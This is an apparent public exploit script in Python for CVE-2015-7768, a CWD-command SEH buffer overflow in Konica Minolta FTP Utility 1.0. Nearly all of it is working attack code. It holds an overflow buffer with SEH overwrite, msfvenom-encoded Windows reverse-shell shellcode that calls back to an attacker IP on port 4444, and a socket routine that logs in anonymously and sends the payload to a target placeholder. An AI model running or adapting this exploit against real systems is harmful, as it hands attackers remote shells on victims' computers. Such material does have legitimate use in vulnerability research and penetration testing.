# Exploit Title: Konica Minolta FTP Utility - CWD Command SEH Based Buffer Overflow Vulnerability
# Date: 24/5/2016
# Exploit Author: Mandar
# Vendor Homepage: http://www.konicaminolta.hk/hk/en-us/download-driver-dl-utilities.php
# Software Link: http://download.konicaminolta.hk/bt/driver/mfpu/ftpu/ftpu_10.zip
# Version: Konica Minolta FTP Utility v1.0
# Tested on: Windows XP SP3, Windows 7 SP1 64bits, Windows 8.1 64bits, Windows 10 pro
# CVE : CVE-2015-7768
# Listen for a reverse netcat connection on port 4444
import socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
junk = "\x41" * 1037 #offset to EIP
#msfvenom -a x86 --platform windows -p windows/shell_reverse_tcp LHOST=10.11.41.55 LPORT=4444 -e x86/shikata_ga_nai -b "\x00\x0d\x0a\x3d\x5c\x2f" -i 3 -f python (replace LHOST with an attacker's IP)
buf = ""
buf += "\xdb\xd2\xbf\xcc\xee\x99\xa8\xd9\x74\x24\xf4\x5d\x2b"
buf += "\xc9\xb1\x5f\x83\xed\xfc\x31\x7d\x15\x03\x7d\x15\x2e"
buf += "\x1b\x22\x04\x1b\xad\xcc\x8f\xb3\xf7\x9b\x0b\xc7\x56"
buf += "\x4d\x9d\x96\x3f\xbc\x43\xcd\x3c\x50\x87\xee\x1c\xbc"
buf += "\x9a\xa9\xc8\x34\x1a\x9c\xbe\xb0\x57\x29\xe3\xb4\x80"
buf += "\x3a\x80\x08\xee\x19\xf4\xd3\xc7\x43\x35\x0e\xb3\x85"
buf += "\x74\x16\x36\x51\xc5\xa5\xe0\x5b\xf0\x29\x11\x62\x83"
buf += "\x56\x98\x21\xea\x69\x23\x10\x7c\x65\x02\x77\x70\xdc"
buf += "\x5a\xd9\x6e\xc5\x55\x07\x15\xba\xb4\x10\xf5\xee\x73"
buf += "\xbc\x17\x68\xe3\x78\x89\x60\x95\x1c\x62\xba\x1f\x60"
buf += "\xd8\x65\x41\xf7\x0c\x30\x56\x08\x79\xd2\x32\x0e\x03"
buf += "\x56\xbf\x9e\xbf\xf7\xba\xe2\xaa\x96\x9d\x1d\x62\xdd"
buf += "\xa7\xbb\x40\x53\xa2\x0f\xd8\x25\x4a\x4e\x4d\x38\xa9"
buf += "\xb6\xb0\x48\x51\xba\x5e\x6d\x23\x80\xd4\x45\x61\x14"
buf += "\x82\xc4\x6d\x69\x93\x19\x69\xe9\x8c\x24\x01\xb5\x68"
buf += "\xc4\xfe\x95\x69\x0c\xa1\x71\xd2\x5d\xb8\x90\x06\x31"
buf += "\xfa\xfe\xf8\x61\x35\x46\xc8\xcb\xf8\x57\xac\x85\x06"
buf += "\x2b\x6d\x02\xb2\x4b\xca\x0e\x87\xaf\x7d\x43\x6b\x1c"
buf += "\x03\x42\x13\xfe\x16\x9c\x70\xf2\xaf\x34\x6e\x42\x2b"
buf += "\xba\xf2\x62\xdc\x9a\x55\x4a\x46\x08\x04\x7a\x8e\x26"
buf += "\x95\xa8\x72\x8e\x8c\x83\xef\xcd\xb6\x10\x91\xfe\xda"
buf += "\x3a\x15\xba\x7c\xef\x24\x1c\x9d\xb7\x57\xe9\x60\x7f"
buf += "\x06\xd3\xf6\x7b\x85\x7b\xd3\xb2\x8c\x30\x85\xb7\x56"
buf += "\x41\x7f\x6c\xab\x01\x7a\x1b\x77\xcf\xd5\x0c\x85\xce"
buf += "\xb6\x6f\x5f\xfb\xc7\x43\xc8\x13\xfe\xae\xcc\xea\xe6"
buf += "\x40\x61\x2c\x75\xdb\x9a\x6b\x03\x80\xc1\x69\xc8\x5f"
buf += "\x16\x31\x16\xf4\x50\x45\x99\xa9\xc5\x7f\xa0\x64\x59"
buf += "\xb3\x95\xe1\xb7\xa6\xe0\x36\x2a\xe3\xc7\xcb\x09\xb0"
buf += "\x84\x37\x67\xa2\x91\xbd\xb8\x38\x26\x68\xa8\x67\x81"
buf += "\x5e\x89\xf8\xf3\x30\xd2\xc2\x37\x25\x2d\x99\xf2\xad"
buf += "\x34\xdf\x21\x2b\x43\xcd\x18\xa0\x95\x9e\xa9\xe4\x44"
buf += "\xb0\xcd"
nseh = "\xeb\x10\x90\x90"
seh = "\xb0\x63\x20\x12"
exploit = junk + nseh + seh + "\x90" *20 + buf + "\x42" * 500
print "sending"
s.connect(('x.x.x.x',21)) # Insert target IP
data = s.recv(1024)
s.send('USER anonymous' + '\r\n')
data = s.recv(1024)
s.send('PASS anonymous' + '\r\n')
data = s.recv(1024)
s.send('CWD ' +exploit+ '\r\n')
s.close